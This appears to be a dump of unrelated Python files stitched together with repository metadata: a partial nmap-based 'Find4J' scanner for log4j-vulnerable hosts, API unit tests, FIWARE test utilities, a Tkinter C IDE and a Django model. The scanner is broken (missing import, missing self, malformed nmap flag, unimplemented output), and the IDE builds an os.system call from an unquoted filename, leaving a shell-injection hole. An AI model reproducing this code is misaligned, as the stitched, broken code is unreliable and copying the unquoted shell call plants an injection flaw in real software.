import nmap
class IntOutOfBounds(Exception):
pass
class PortOutOfBounds(Exception):
pass
class Find4JClass():
def banner():
""" Banner for Find4J """
print("""
______ _ _ ___ ___
| ___(_) | | / | |_ |
| |_ _ _ __ __| |/ /| | | |
| _| | | '_ \ / _` / /_| | | |
| | | | | | | (_| \___ |/\__/ /
\_| |_|_| |_|\__,_| |_/\____/
""")
print("Find4J is a Python script to find applications potentially vulnerable to log4j.")
print("Developed By: <NAME>")
print("Based on Python-Nmap\n")
def create_scan(ip, ports):
""" Function to create scan with user inputs """
nm = nmap.PortScanner()
nm.scan(hosts=ip, arguments='sV -sC')
return nm, ip, ports
def compare_data(self, product):
""" Function to compare found products with that of known log4j vulnerabilities """
with open("vuln.csv", 'r') as f:
reader = csv.reader(f, delimiter="\n")
for vuln in reader:
if str(product) in str(vuln):
return True
def print_scan_data(self, scan):
""" Function to print product scan data """
nm, ip, port = scan
vulnerable = []
ports = nm[ip]['tcp'].keys()
for host in nm.all_hosts():
for port in ports:
product = nm[host]['tcp'][port]['product']
if self.compare_data(product):
vulnerable.append([host, product])
def output_scan_data():
""" Function to output scan data to csv """
raise NotImplementedError
```
|
{
"source": "JesusPaz/sd-midterm2",
"score": 3
}
|
#### File: sd-midterm2/test/tests.py
```python
import unittest
import requests
import json
class TestUsersApi(unittest.TestCase):
API_URL = "http://apiflask-env.uuhyrnua83.us-east-2.elasticbeanstalk.com"
def test_get_all_users(self):
response = requests.get(self.API_URL+'/users',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 200, "Should be 200")
def test_path_not_found(self):
response = requests.get(self.API_URL+'/user',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 404, "Should be 404")
def test_add_new_user(self):
response = requests.post(self.API_URL+'/users/JesusPaz',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 200, "Should be 200")
data = json.loads(response.content)
aux = json.loads(data)
userId = aux["id"]
numRepos = aux["numRepos"]
# Used to delete the user and can try the test again
response = requests.delete(self.API_URL+'/users/JesusPaz',
headers={'Accept': 'application/json'})
# test deleted ok
self.assertEqual(response.status_code, 200, "Should be 200")
self.assertTrue(userId != "" and userId != None, "Can not be empty or None")
# Commented because i create many repos all time
# Will be ok
# self.assertEqual(numRepos, 22, "Number of repos should be 22")
def test_add_new_user_empty_name(self):
response = requests.post(self.API_URL+'/users/ ',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_add_new_user_exists_in_database(self):
response = requests.post(self.API_URL+'/users/danielq97',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_add_new_user_dont_exists_in_github(self):
response = requests.post(self.API_URL+'/users/atdgps85632s',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_delete_user_dont_exist(self):
response = requests.delete(self.API_URL+'/users/atdgps85632s',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_delete_user_empty_name(self):
response = requests.delete(self.API_URL+'/users/ ',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jesuspg/fiware-puppetwrapper",
"score": 2
}
|
#### File: acceptance_tests/commons/authentication_utils.py
```python
__author__ = 'jfernandez'
import json
from rest_utils import RestUtils
from configuration import CONFIG_KEYSTONE_TENANT_NAME_VALUE, \
CONFIG_KEYSTONE_USERNAME_VALUE, CONFIG_KEYSTONE_PWD_VALUE
from constants import AUTH_TENANT_NAME, AUTH_PASSWORD, AUTH_USERNAME, AUTH, AUTH_ACCESS, AUTH_TENANT, AUTH_TOKEN, \
AUTH_ID, AUTH_PASSWORD_CREDENTIALS, CONTENT_TYPE, CONTENT_TYPE_JSON, ACCEPT_HEADER, ACCEPT_HEADER_JSON
KEYSTONE_BODY = {AUTH: {AUTH_TENANT_NAME: CONFIG_KEYSTONE_TENANT_NAME_VALUE,
AUTH_PASSWORD_CREDENTIALS: {AUTH_USERNAME: CONFIG_KEYSTONE_USERNAME_VALUE,
AUTH_PASSWORD: <PASSWORD>_KEYSTONE_PWD_VALUE}}}
CONFIG_KEYSTONE_HEADERS = {CONTENT_TYPE: CONTENT_TYPE_JSON, ACCEPT_HEADER: ACCEPT_HEADER_JSON}
def get_auth_data_from_keystone():
body = json.dumps(KEYSTONE_BODY)
r = RestUtils.get_keystone_token(body=body, headers=CONFIG_KEYSTONE_HEADERS)
response = r.json()
token_id = response[AUTH_ACCESS][AUTH_TOKEN][AUTH_ID]
tenant_id = response[AUTH_ACCESS][AUTH_TOKEN][AUTH_TENANT][AUTH_ID]
return token_id, tenant_id
```
#### File: acceptance_tests/commons/install_model.py
```python
__author__ = 'jfernandez'
from constants import GROUP, VERSION, SOFTWARE_NAME, OP_SOFTWARE_NAME, INSTALL_ATTRIBUTES, ACTION, INSTALL, UNINSTALL
# Model: {"attributes": [], "version": "", "group": "", "softwareName": ""}
def install_simple_model(version, group, software_name):
return {VERSION: version, GROUP: group, SOFTWARE_NAME: software_name}
def install_attributes_model(version, group, software_name, attribute_list):
return {VERSION: version, GROUP: group, SOFTWARE_NAME: software_name, INSTALL_ATTRIBUTES: attribute_list}
def _software_to_manage_response_model(software_name, version, action, attributes):
if attributes is not None:
return {OP_SOFTWARE_NAME: software_name, VERSION: version, ACTION: action, INSTALL_ATTRIBUTES: attributes}
else:
return {OP_SOFTWARE_NAME: software_name, VERSION: version, ACTION: action}
def software_to_install_response_model(software_name, version, attributes=None):
return _software_to_manage_response_model(software_name, version, INSTALL, attributes)
def software_to_uninstall_response_model(software_name, version, attributes=None):
return _software_to_manage_response_model(software_name, version, UNINSTALL, attributes)
```
|
{
"source": "jesuspg/fiware-sdc",
"score": 2
}
|
#### File: acceptance/commons/rest_utils.py
```python
__author__ = 'arobres, jfernandez'
from json import JSONEncoder
from configuration import SDC_IP, SDC_PORT, SDC_PROTOCOL, CONFIG_PUPPETDB_PROTOCOL, CONFIG_PUPPETDB_IP,\
CONFIG_PUPPETDB_PORT
from constants import *
import requests
SDC_SERVER = '{}://{}:{}'.format(SDC_PROTOCOL, SDC_IP, SDC_PORT)
PRODUCT_PATTERN_ROOT = '{url_root}/sdc/rest/catalog/product/'
PRODUCT_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}'
PRODUCT_RELEASE_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/release'
VERSION_RELEASE_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/release/{version}'
PRODUCT_ATTRIBUTES_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/attributes'
PRODUCT_METADATA_LIST_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/metadatas'
PRODUCT_METADATA_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/metadatas/{metadata_key}'
PRODUCTANDRELEASE_PATTERN_ROOT = '{url_root}/sdc/rest/catalog/productandrelease/'
INSTALL_PATTERN = '{url_root}/sdc/rest/vdc/{vdc_id}/productInstance'
PRODUCT_INSTALLED_PATTERN = '{url_root}/sdc/rest/vdc/{vdc_id}/productInstance/{product_id}'
TASK_PATTERN_ROOT = '{url_root}/sdc/rest/vdc/{vdc_id}/task'
TASK_PATTERN = "{url_root}/sdc/rest/vdc/{vdc_id}/task/{task_id}"
NODE_PATTERN_ROOT = "{url_root}/sdc/rest/vdc/{vdc_id}/chefClient"
NODE_PATTERN = "{url_root}/sdc/rest/vdc/{vdc_id}/chefClient/{node_name}"
METADATA_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}'
#PuppetDB
PUPPETDB_ROOT_PATTERN = '{}://{}:{}'.format(CONFIG_PUPPETDB_PROTOCOL, CONFIG_PUPPETDB_IP, CONFIG_PUPPETDB_PORT)
PUPPETDB_NODE_PATTERN_ROOT = '{url_root}/v3/nodes'
requests.packages.urllib3.disable_warnings()
class RestUtils(object):
def __init__(self):
"""Initialization method
"""
self.api_url = SDC_SERVER
self.encoder = JSONEncoder()
def _call_api(self, pattern, method, body=None, headers=None, payload=None, **kwargs):
"""Launch HTTP request to Policy Manager API with given arguments
:param pattern: string pattern of API url with keyword arguments (format string syntax)
:param method: HTTP method to execute (string)
:param body: JSON body content (dict)
:param headers: HTTP header request (dict)
:param payload: Query parameters for the URL
:param **kwargs: URL parameters (without url_root) to fill the patters
:returns: REST API response
"""
kwargs['url_root'] = self.api_url
url = pattern.format(**kwargs)
#print "==============="
#print "### REQUEST ###"
#print 'METHOD: {}\nURL: {} \nHEADERS: {} \nBODY: {}'.format(method, url, headers, self.encoder.encode(body))
try:
if headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
r = requests.request(method=method, url=url, data=self.encoder.encode(body), headers=headers,
params=payload, verify=False)
else:
r = requests.request(method=method, url=url, data=body, headers=headers, params=payload, verify=False)
except Exception, e:
print "Request {} to {} crashed: {}".format(method, url, str(e))
return None
#print "### RESPONSE ###"
#print "HTTP RESPONSE CODE:", r.status_code
#print 'HEADERS: {} \nBODY: {}'.format(r.headers, r.content)
return r
def add_new_product(self, headers=None, body=None):
return self._call_api(pattern=PRODUCT_PATTERN_ROOT, method='post', headers=headers, body=body)
def retrieve_product(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_attributes(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_ATTRIBUTES_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_metadatas(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_METADATA_LIST_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_metadata(self, product_id, metadata_key, headers=None, method='get'):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method=method, headers=headers, product_id=product_id,
metadata_key=metadata_key)
def delete_product_metadata(self, product_id, metadata_key, headers=None):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method='delete', headers=headers, product_id=product_id,
metadata_key=metadata_key)
def update_product_metadata(self, body, product_id, metadata_key, headers=None):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method='put', headers=headers, product_id=product_id,
metadata_key=metadata_key, body=body)
def delete_product(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_PATTERN, method='delete', headers=headers, product_id=product_id)
def retrieve_product_list(self, headers=None):
return self._call_api(pattern=PRODUCT_PATTERN_ROOT, method='get', headers=headers)
def add_product_release(self, headers=None, body=None, product_id=None):
return self._call_api(pattern=PRODUCT_RELEASE_PATTERN, method='post', headers=headers, product_id=product_id,
body=body)
def delete_product_release(self, headers=None, product_id=None, version=None):
return self._call_api(pattern=VERSION_RELEASE_PATTERN, method='delete', headers=headers, product_id=product_id,
version=version)
def retrieve_product_release_information(self, headers=None, product_id=None, version=None):
return self._call_api(pattern=VERSION_RELEASE_PATTERN, method='get', headers=headers, product_id=product_id,
version=version)
def retrieve_product_release_list(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_RELEASE_PATTERN, method='get', headers=headers, product_id=product_id)
def install_product(self, headers=None, vdc_id=None, body=None):
return self._call_api(pattern=INSTALL_PATTERN, method='post', headers=headers, vdc_id=vdc_id, body=body)
#TODO: @deprecated
def uninstall_product(self, headers=None, product_id=None, vdc_id=None, fqn=''):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
product_id="{}_{}".format(fqn, product_id))
#TODO: @deprecated
def retrieve_list_products_installed(self, headers=None, vdc_id=None,):
return self._call_api(pattern=INSTALL_PATTERN, method='get', headers=headers, vdc_id=vdc_id)
#TODO: @deprecated
def retrieve_product_installed_information(self, headers=None, product_id=None, vdc_id=None, fqn=''):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='get', headers=headers, vdc_id=vdc_id,
product_id="{}_{}".format(fqn, product_id))
#TODO: @deprecated. Should be renamed when uninstall_product is deleted
def uninstall_product_by_product_instance_id(self, headers=None, vdc_id=None, product_instance_id=None):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
product_id=product_instance_id)
def retrieve_task(self, headers=None, vdc_id=None, task_id=None):
return self._call_api(pattern=TASK_PATTERN, method='get', headers=headers, vdc_id=vdc_id, task_id=task_id)
def retrieve_product_instance_list(self, headers=None, vdc_id=None):
return self._call_api(pattern=INSTALL_PATTERN, method='get', headers=headers, vdc_id=vdc_id)
def retrieve_product_instance(self, headers=None, vdc_id=None, product_instance_id=None):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='get', headers=headers, vdc_id=vdc_id,
product_id=product_instance_id)
def retrieve_productandrelease_list(self, headers=None):
return self._call_api(pattern=PRODUCTANDRELEASE_PATTERN_ROOT, method='get', headers=headers)
def request_productandrelease(self, headers=None, method=None):
return self._call_api(pattern=PRODUCTANDRELEASE_PATTERN_ROOT, method=method, headers=headers)
def retrieve_node_list(self, headers, vdc_id):
return self._call_api(pattern=NODE_PATTERN_ROOT, method='get', headers=headers, vdc_id=vdc_id)
def delete_node(self, headers, vdc_id, node_name):
return self._call_api(pattern=NODE_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
node_name=node_name)
def retrieve_puppetdb_node_list(self):
"""
This method gets the list of registered nodes from PuppetDB
:return: REST API response (Requests lib)
"""
url = PUPPETDB_NODE_PATTERN_ROOT.format(url_root=PUPPETDB_ROOT_PATTERN)
return requests.request(method='get', url=url, verify=False)
@staticmethod
def call_url_task(method=None, headers=None, url=None):
try:
r = requests.request(method=method, url=url, headers=headers)
except Exception, e:
print "Request {} to {} crashed: {}".format(method, url, str(e))
return None
return r
def _uninstall_product_if_installed(self, product, headers):
if product[STATUS] == TASK_STATUS_VALUE_INSTALLED:
response = self.uninstall_product_by_product_instance_id(headers=headers,
vdc_id=headers[TENANT_ID_HEADER],
product_instance_id=product[PRODUCT_NAME])
assert response.ok
def uninstall_all_products(self, headers=None):
response = self.retrieve_product_instance_list(headers, headers[TENANT_ID_HEADER])
products_installed_body = response.json()
if not isinstance(products_installed_body, list):
self._uninstall_product_if_installed(products_installed_body, headers)
else:
for product in products_installed_body:
self._uninstall_product_if_installed(product, headers)
def delete_all_testing_products(self, headers=None):
response = self.retrieve_product_list(headers=headers)
assert response.ok
try:
product_list = response.json()
except:
assert response.content == 'null'
return
if not isinstance(product_list, list):
if ('testing' in product_list[PRODUCT_NAME] or 'qa-test' in product_list[PRODUCT_NAME]) \
and 'testing_prov_' not in product_list[PRODUCT_NAME]:
delete_response = self.delete_product(headers=headers, product_id=product_list[PRODUCT_NAME])
if not delete_response.ok:
release_list = self.retrieve_product_release_list(headers=headers,
product_id=product_list[PRODUCT_NAME])
release_list = release_list.json()
print "RELEASE LIST: {}".format(release_list)
delete_release = self.delete_product_release(headers=headers, product_id=product_list[PRODUCT_NAME],
version=release_list[VERSION])
#assert delete_release.ok
delete_response = self.delete_product(headers=headers, product_id=product_list[PRODUCT_NAME])
#assert delete_response.ok
else:
for product in product_list:
if ('testing' in product[PRODUCT_NAME] or 'qa-test' in product[PRODUCT_NAME]) \
and 'testing_prov_' not in product[PRODUCT_NAME]:
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
if not delete_response.ok:
release_list = self.retrieve_product_release_list(headers=headers,
product_id=product[PRODUCT_NAME])
release_list = release_list.json()
if not isinstance(release_list, list):
delete_release = self.delete_product_release(headers=headers,
product_id=product[PRODUCT_NAME],
version=release_list[VERSION])
#assert delete_release.ok, delete_release.content
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
#assert delete_response.ok
else:
for release in release_list:
delete_release = self.delete_product_release(headers=headers,
product_id=product[PRODUCT_NAME],
version=release[VERSION])
#assert delete_release.ok, delete_release.content
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
#assert delete_response.ok
```
#### File: acceptance/commons/utils.py
```python
__author__ = 'arobres, jfernandez'
import xmldict
import xmltodict
import string
import random
import time
from commons.rest_utils import RestUtils
from constants import *
from lxml import etree
from commons.fabric_utils import execute_file_exist
from configuration import WAIT_FOR_OPERATION, WAIT_FOR_INSTALLATION
def __set_none_as_empty_value__(python_dict_element):
""" Replace all None values of a dict by an empty value ""
:param python_dict_element: Dict to be analyzed. Will be replaced itself.
:return: None
"""
for element in python_dict_element:
if python_dict_element[element] is None:
python_dict_element.update({element: ''})
elif isinstance(element, dict):
__set_none_as_empty_value__(element)
def dict_to_xml(dict_to_convert):
return xmldict.dict_to_xml(dict_to_convert)
def xml_to_dict(xml_to_convert):
return xmldict.xml_to_dict(xml_to_convert)
def xml_to_dict_attr(xml_to_convert):
return xmltodict.parse(xml_to_convert, attr_prefix='')
def response_body_to_dict(http_response, accept_content_type, with_attributes=False, xml_root_element_name=None,
is_list=False):
"""
Method to convert a XML o JSON response in a Python dict
:param http_response: 'Requests (lib)' response
:param accept_content_type: Accept header value
:param with_attributes: For XML requests. If True, XML attributes will be processed
:param xml_root_element_name: For XML requests. XML root element in response.
:param is_list: For XML requests. If response is a list, a True value will delete list node name
:return: Python dict with response.
"""
if ACCEPT_HEADER_JSON in accept_content_type:
try:
return http_response.json()
except Exception, e:
print str(e)
else:
if with_attributes is True:
return xml_to_dict_attr(http_response.content)[xml_root_element_name]
else:
assert xml_root_element_name is not None,\
"xml_root_element_name is a mandatory param when body is in XML and attributes are not considered"
response_body = xml_to_dict(http_response.content)[xml_root_element_name]
if response_body is not None:
__set_none_as_empty_value__(response_body)
if is_list and response_body is not None:
response_body = response_body.popitem()[1]
return response_body
def body_model_to_body_request(body_model, content_type, body_model_root_element=None):
if CONTENT_TYPE_XML in content_type:
return dict_to_xml(body_model)
else:
return body_model[body_model_root_element]
def set_default_headers(token_id, tenant_id):
headers = dict()
headers[AUTH_TOKEN_HEADER] = token_id
headers[TENANT_ID_HEADER] = tenant_id
headers[CONTENT_TYPE] = CONTENT_TYPE_XML
headers[ACCEPT_HEADER] = CONTENT_TYPE_JSON
return headers
def id_generator(size=10, chars=string.ascii_letters + string.digits):
"""Method to create random ids
:param size: define the string size
:param chars: the characters to be use to create the string
return ''.join(random.choice(chars) for x in range(size))
"""
return ''.join(random.choice(chars) for x in range(size))
def delete_keys_from_dict(dict_del, key):
"""
Method to delete keys from python dict
:param dict_del: Python dictionary with all keys
:param key: key to be deleted in the Python dictionary
:returns a new Python dictionary without the rules deleted
"""
if key in dict_del.keys():
del dict_del[key]
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, key)
return dict_del
def delete_keys_when_value_is_none(dict_del):
default_dict = dict_del.copy()
for v in default_dict.keys():
if default_dict[v] is None:
del dict_del[v]
return dict_del
def replace_none_value_metadata_to_empty_string(list_of_metadatas):
"""
In a metadata list, replace None value by empty string
:param list_of_metadatas:
:return:
"""
for metadata in list_of_metadatas:
if metadata['value'] is None:
metadata['value'] = ''
def wait_for_task_finished(vdc_id, task_id, seconds=WAIT_FOR_OPERATION, status_to_be_finished=None, headers=None):
rest_utils = RestUtils()
correct_status = False
for count in range(seconds):
response = rest_utils.retrieve_task(headers=headers, vdc_id=vdc_id, task_id=task_id)
response_body = response_body_to_dict(response, headers[ACCEPT_HEADER], with_attributes=True,
xml_root_element_name=TASK)
status = response_body[TASK_STATUS]
print '[TASK] Waiting for task status. CHECK: {} - STATUS: {}'.format(count, status)
if status == status_to_be_finished:
correct_status = True
break
elif status != TASK_STATUS_VALUE_RUNNING:
break
time.sleep(5)
if correct_status is False:
print "[TASK] Response body:", response_body
return correct_status
def wait_for_software_installed(seconds=WAIT_FOR_INSTALLATION, status_to_be_finished=True, file_name=None):
for count in range(seconds/3):
response = execute_file_exist(test_file_name=file_name)
print "Waiting for file status. FILE EXISTS: {}".format(response)
if status_to_be_finished == response:
return True
time.sleep(3)
return False
#@deprecated [utils.response_body_to_dict]
def convert_response_to_json(response):
response_headers = response.headers
if response_headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
try:
response_body = response.json()
except Exception, e:
print str(e)
else:
response_body = xml_to_dict(response.content)
return response_body
def get_installation_response(response):
response_headers = response.headers
if response_headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
try:
response_body = response.json()
status = response_body[STATUS_XML]
href = response_body[TASK_URL]
vdc = response_body[VDC]
except Exception, e:
print str(e)
else:
try:
response_xml = etree.XML(response.content)
href = response_xml.xpath("//task/@href")[0]
status = response_xml.xpath("//task/@status")[0]
vdc = response_xml.xpath("//task/vdc")[0].text
except Exception, e:
print str(e)
return href, status, vdc
def generate_product_instance_id(vm_fqn, product_name, product_version):
"""
Method to generate instance id for installed products (product instances)
:param vm_fqn: FQN (where product has been installed)
:param product_name: Product name (instance)
:param product_version: Product release (instance)
:return: Product instance ID
"""
return "{}_{}_{}".format(vm_fqn, product_name, product_version)
def _replace_ipall_att_value(attribute, installator):
"""
If installator is Puppet, list of values (IPALL type) is installed by our testing manifest without ",".
This method return the list without that character to validate a successful installation
:param attribute: Instance attribute to be processed
:return: If installator is Puppet, list of values when attribute type is IPALL will be processed
to delete the "," character
"""
if installator == 'puppet' and ATTRIBUTE_TYPE in attribute and attribute[ATTRIBUTE_TYPE] == ATTRIBUTE_TYPE_IPALL:
return attribute[VALUE].replace(",", "")
else:
return attribute[VALUE]
def generate_content_installed_by_product(product_name, product_version, instance_attributes, installator='chef'):
att_01 = PRODUCT_INSTALLATION_ATT1_DEFAULT
att_02 = PRODUCT_INSTALLATION_ATT2_DEFAULT
if instance_attributes is not None or len(instance_attributes) != 0:
if len(instance_attributes) >= 1:
att_01 = _replace_ipall_att_value(instance_attributes[0], installator)
if len(instance_attributes) >= 2:
att_02 = _replace_ipall_att_value(instance_attributes[1], installator)
return PRODUCT_INSTALLATION_FILE_CONTENT.format(product_name=product_name, product_version=product_version,
att_01=att_01, att_02=att_02)
```
#### File: uninstall_product/feature/terrain.py
```python
__author__ = 'jfernandez'
from lettuce import world, before, after
from commons.terrain_steps import setup_feature, setup_scenario, setup_outline, tear_down
from commons.provisioning_steps import ProvisioningSteps
from commons.rest_utils import RestUtils
from commons.configuration import CONFIG_VM_HOSTNAME
from commons.fabric_utils import execute_chef_client, execute_puppet_agent, remove_chef_client_cert_file, \
execute_chef_client_stop, execute_puppet_agent_stop, remove_puppet_agent_cert_file, remove_all_generated_test_files, \
remove_puppet_agent_catalog
provisioning_steps = ProvisioningSteps()
rest_utils = RestUtils()
@before.each_feature
def before_each_feature(feature):
"""
Hook: Will be executed before each feature. Configures global vars and gets token from keystone.
Launch agents (puppet and chef) in the target VM
"""
setup_feature(feature)
@before.each_scenario
def before_each_scenario(scenario):
"""
Hook: Will be executed before each Scenario.
Setup Scenario: initialize World vars and launch agents (puppet and chef) in the target VM
"""
setup_scenario(scenario)
execute_chef_client()
execute_puppet_agent()
@before.outline
def before_outline(param1, param2, param3, param4):
""" Hook: Will be executed before each Scenario Outline. Same behaviour as 'before_each_scenario'"""
setup_outline(param1, param2, param3, param4)
remove_all_generated_test_files()
remove_puppet_agent_catalog()
@after.each_scenario
def after_each_scenario(scenario):
"""
Hook: Will be executed after all each scenario
Removes Feature data and cleans the system. Kills all agents running in the VM.
"""
execute_chef_client_stop()
execute_puppet_agent_stop()
remove_chef_client_cert_file()
remove_puppet_agent_cert_file()
remove_all_generated_test_files()
remove_puppet_agent_catalog()
rest_utils.delete_node(world.headers, world.tenant_id, CONFIG_VM_HOSTNAME)
@after.all
def after_all(scenario):
"""
Hook: Will be executed after all each scenario
Removes Feature data and cleans the system. Kills all agents running in the VM.
"""
after_each_scenario(scenario)
tear_down(scenario)
```
|
{
"source": "JesusProfile/colloquium",
"score": 3
}
|
#### File: colloquium/InfotecsPython/toTestTxt.py
```python
import re # for regulars
# Same class lies in script.py
class workerTxt:
def __init__(self, filename):
self.filename = filename
def get_town_by_id(self, id):
file = open(self.filename)
for line in file:
if(line.startswith(str(id)+'\t')):
return line.replace(str(id)+'\t', '')
return "No such town"
def get_n_towns_from(self, id, count):
file = open(self.filename)
towns = []
n = 0
start_count = False
for line in file:
if(line.startswith(str(id)+'\t')):
start_count = True
if(start_count):
if(n == count):
return towns
towns.append(re.sub(r'^\d*\t','',line))
n += 1
if(not start_count):
return "No such town"
file = open(self.filename)
for line in file:
if (n == count):
return towns
towns.append(re.sub(r'^\d*\t','',line))
n += 1
def get_n_towns(self, count):
file = open(self.filename)
towns = []
for i in range(count):
towns.append(re.sub(r'^\d*\t','',file.readline()))
return towns
def get_norther_town(self, first, second):
file = open(self.filename)
first_pretenders = [] # номинанты быть первым городом
second_pretenders = [] # номинанты быть вторым городом
for line in file:
info = line.split('\t')
search = re.search("," + first + r"$", info[3])
if(search): # состоит ли первый город в перечислении альтернативных названий города
first_pretenders.append(info)
search = re.search("," + second + r"$", info[3])
if(search):
second_pretenders.append((info))
if(not first_pretenders and not second_pretenders):
return "No such towns"
if(not first_pretenders):
return "No such first town"
if(not second_pretenders):
return "No such second town"
if(len(first_pretenders)>1):
nice_pretender = first_pretenders[0]
for pretender in first_pretenders: # Рассматриваем каждого претендента
if(pretender[14]>nice_pretender[14]):
nice_pretender = pretender
first_pretenders = [nice_pretender]
if(len(second_pretenders)>1):
nice_pretender = second_pretenders[0]
for pretender in second_pretenders: # Рассматриваем каждого претендента
if (pretender[14] > nice_pretender[14]):
nice_pretender = pretender
second_pretenders = [nice_pretender]
if(first_pretenders[0][4] >= second_pretenders[0][4]):
town1 = "\t".join(first_pretenders[0][1:])
town2 = "\t".join(second_pretenders[0][1:])
if(second_pretenders[0][4] > first_pretenders[0][4]):
town1 = "\t".join(second_pretenders[0][1:])
town2 = "\t".join(first_pretenders[0][1:])
difference = "Нет временной разницы" if first_pretenders[0][-2] == second_pretenders[0][-2] else "Есть временная разница"
towns = {"north":town1,"south":town2,"difference":difference}
return towns
# TESTS
if(__name__ == "__main__"):
worker = workerTxt("RU.txt")
# print("No such town (id == 1):\n", worker.get_town_by_id(1))
# print("Return town:\n", worker.get_town_by_id(451748))
test = worker.get_n_towns_from(451747,50)
print("Return 50 towns:\n", test)
test = worker.get_n_towns_from(12110389,50)
print(f"Return 50 towns after end of file:\n Length == {len(test)}\n", test[0],test[49])
print("No such town (id == 1):\n", worker.get_n_towns_from(1,50))
# print("Return 50 towns from start:\n", worker.get_n_towns(50))
# print("No such towns:\n", worker.get_norther_town("asd","asdsf"))
# print("Return norther town, no difference:\n", worker.get_norther_town("Посёлок Логи","<NAME>"))
# print("Return norther town, there is difference:\n", worker.get_norther_town("Урочище Салокачи", "<NAME>"))
```
|
{
"source": "jesusrafaelchris/Arduino-IDE-in-C",
"score": 3
}
|
#### File: jesusrafaelchris/Arduino-IDE-in-C/C_IDE.py
```python
from tkinter import *
import subprocess
import os
import sys
from tkinter.filedialog import asksaveasfile
import os.path
import time
# Some code here
filename = []
root = Tk()
root.geometry("500x500")
root.title("C IDE")
root.minsize(350, 350)
def redirector(inputStr):
STDOutput.configure(state="normal")
STDOutput.insert(INSERT, inputStr)
STDOutput.configure(state="disabled")
def deleteText():
STDOutput.configure(state="normal")
STDOutput.delete('1.0', END)
STDOutput.configure(state="disabled")
def updatefile():
with open(filename[0],'w') as text:
text.write(inputtxt.get("1.0", "end-1c"))
def save():
if not filename:
files = [('C Files', '*.c')]
f = asksaveasfile(mode='w', defaultextension=".c")
if f is None: # asksaveasfile return `None` if dialog closed with "cancel".
return
text2save = inputtxt.get("1.0", "end-1c") # starts from `1.0`, not `0.0`
f.write(text2save)
filename.clear()
filename.insert(0,str(f.name))
f.close()
else:
updatefile()
def savefile():
if not filename:
save()
else:
updatefile()
def run():
savefile()
deleteText()
os.system("gcc -o out " + filename[0])
process = subprocess.Popen(['./out'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
#stdout_data,stderr_data = process.communicate()
#errcode = process.returncode
output = process.stdout.read()
error = process.stderr.read()
print(output)
print(error)
#Output.insert(END,str(out))
process.kill()
process.terminate()
menubar = Menu(root)
filemenu = Menu(menubar, tearoff=0)
#filemenu.add_command(label="New", command=donothing)
#filemenu.add_command(label="Open", command=donothing)
filemenu.add_command(label="Save", command=lambda : save())
root.bind('<Command-s>', lambda event: save())
root.bind('<Control-s>', lambda event: save())
filemenu.add_command(label="Run", command=lambda : run())
root.bind('<Command-r>', lambda event: run())
root.bind('<Control-r>', lambda event: run())
filemenu.add_separator()
filemenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="File", menu=filemenu)
#helpmenu = Menu(menubar, tearoff=0)
#helpmenu.add_command(label="Help Index", command=donothing)
#helpmenu.add_command(label="About...", command=donothing)
#menubar.add_cascade(label="Help", menu=helpmenu)
root.config(menu=menubar)
l = Label(text = "Write your code")
inputtxt = Text(root, height = 20,
width = 110,
bg = "white")
STDOutput = Text(root, height = 10,
width = 25,
bg = "black",
fg = "orange")
startcode = """#include <stdio.h>
#include <stdlib.h>
int main(void) {
}
"""
#l.pack(fill=BOTH, expand=1)
inputtxt.pack(fill=BOTH, expand=1)
STDOutput.pack(fill=BOTH, expand=1, side = LEFT)
inputtxt.insert('1.0', startcode)
sys.stdout.write = redirector
mainloop()
```
|
{
"source": "jesusRL96/curso_platzi_django_adv",
"score": 2
}
|
#### File: circles/models/circles.py
```python
from django.db import models
from cride.utils.models import CRideModel
class Circle(CRideModel):
"""Cirle model
private group"""
name = models.CharField('circle name', max_length=140)
slug_name = models.SlugField('slug name', max_length=140, unique=True)
about = models.CharField('circle description', max_length=255)
picture = models.ImageField('circle picture', upload_to='circles/pictures/', blank=True, null=True)
# stats
rides_offered = models.PositiveIntegerField(default=0)
rides_taken = models.PositiveIntegerField(default=0)
verified = models.BooleanField('verified circle', default=False, help_text="verified circles are officials communities")
